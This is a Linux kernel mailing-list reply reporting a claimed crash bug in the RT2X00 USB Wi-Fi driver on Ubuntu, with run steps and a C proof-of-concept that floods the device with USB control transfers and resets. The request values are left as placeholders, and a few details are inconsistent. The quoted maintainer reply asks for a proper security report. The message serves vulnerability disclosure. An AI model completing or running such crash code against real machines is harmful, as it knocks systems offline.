[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAOV16XF2g5SV3yL=dyoBdLZd6bEDxDcYZtCw8NftfsP6hy0Gmg@mail.gmail.com>
Date: Sat, 3 Aug 2024 13:42:28 +0800
From: color Ice <wirelessdonghack@...il.com>
To: Kalle Valo <kvalo@...nel.org>
Cc: Mark Esler <mark.esler@...onical.com>, stf_xl@...pl, linux-wireless@...r.kernel.org,
linux-kernel@...r.kernel.org, Greg KH <gregkh@...uxfoundation.org>
Subject: Re: Ubuntu RT2X00 WIFI USB Driver Kernel NULL pointer
Dereference&Use-After-Free Vulnerability
Reproduction conditions for this vulnerability:
Target version: Ubuntu22.04&24.04.
Load the wireless network card using the RT2X00 driver to the target
system. Use the lsusb command to view the ID and PID. For example:
Bus 001 Device 008: ID 0a5c:bd17 Broadcom Corp. BCM43236 802.11abgn
Wireless Adapter Replace dev = usb.core.find(idVendor=0a5c,
idProduct=0xbd17) in the general script with the ID number of your own
PC machine.
Execute: sudo python3 poc.py and wait quietly, the system will crash directly.
Note: pyusb library: PyUSB provides Python 3 with easy access to host
Universal Serial Bus (USB) systems.
This library is very safe. https://github.com/pyusb/pyusb or PIP install pyusb.
I am submitting a C language POC to you, but I believe it is not as
stable as the Python version. You can give it a try.
poc.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <libusb-1.0/libusb.h>
#define VENDOR_ID 0x148f
#define PRODUCT_ID 0x3070
#define DATA_SIZE 64
// Define your requests here (example)
struct usb_request {
uint8_t bmRequestType;
uint8_t bRequest;
uint16_t wValue;
uint16_t wIndex;
uint16_t data_length; // You may need to adjust this based on your
actual requests
};
struct usb_request requests[] = {
{ /* fill with your request parameters */ },
{ /* fill with your request parameters */ },
// Add more requests as needed
};
int main() {
libusb_device_handle *dev_handle;
int r;
// Initialize libusb
r = libusb_init(NULL);
if (r < 0) {
fprintf(stderr, "Error initializing libusb: %s\n", libusb_error_name(r));
return 1;
}
// Open device
dev_handle = libusb_open_device_with_vid_pid(NULL, VENDOR_ID, PRODUCT_ID);
if (dev_handle == NULL) {
fprintf(stderr, "Device not found or could not be opened.\n");
libusb_exit(NULL);
return 1;
}
// Run specified requests
int i, j;
for (i = 0; i < 100; i++) {
for (j = 0; j < sizeof(requests) / sizeof(requests[0]); j++) {
struct usb_request *req = &requests[j];
unsigned char data[DATA_SIZE];
memset(data, 0xFF, DATA_SIZE);
r = libusb_control_transfer(dev_handle, req->bmRequestType, req->bRequest,
req->wValue, req->wIndex, data, req->data_length, 0);
if (r < 0) {
fprintf(stderr, "Control transfer failed: %s\n", libusb_error_name(r));
}
usleep(100000); // Sleep for 0.3 seconds between requests
}
libusb_reset_device(dev_handle); // Reset device after each transfer
}
libusb_close(dev_handle);
libusb_exit(NULL);
return 0;
}
gcc -o usbpoc poc.c -lusb-1.0
sudo ./usbpoc
Kalle Valo <kvalo@...nel.org> 于2024年8月3日周六 05:03写道:
>
> Mark Esler < mark.esler@...onical.com > 写道:
>
> > 2024 年 8 月 2 日星期五下午 03:57:47 +0800,color Ice 写道:
> >> 尊敬的 RT2X00 驱动程序维护人员,
> >>
> >> 我们在 RT2X00 驱动程序中发现了一个严重漏洞。我们
> 建议紧急提交更新。
> >>
> >> *漏洞描述*:当 PC 运行 Ubuntu 22.04 或 24.04 时,
> 执行我们的概念验证 (POC) 可能会直接导致空指针
> 取消引用或释放后使用 (UAF)。我们测试的系统是:
> >>
> >> - *说明*:Ubuntu 22.04.4 LTS *发布*:22.04
> >> - *说明*:Ubuntu 24.04 LTS *发布*:24.04
> >>
> >> 我们测试了 RT2870/RT3070/RT5370 系列的网卡,它们都
> 属于 RT2X00 驱动程序组,并且都能够触发漏洞
> 。此外,执行 POC 只需要用户级
> 权限。Debian 系统不受影响。
> >
> > 目前尚不清楚 Ubuntu 是否是唯一受影响的发行版。
>
> 由于没有关于该
> 问题的描述,因此也不清楚这是如何工作的。我不会运行任何脚本,也不知道 python
> usb.core 包是如何工作的。我猜它需要 root 权限才能
> 发送这些 USB 命令?如果这确实是一个安全漏洞,以下是 如何报告它们的
>
> 说明: https://docs.kernel.org/proces s/security-bugs.html 还添加了 Greg。-- https : //patchwork.kernel.org/project/linux-wireless/list/ https://wireless.wiki.kernel.o rg/en/developers/documentation /submittingpatches
>
>
>
>
>
>
>
>
>
>
Powered by blists - more mailing lists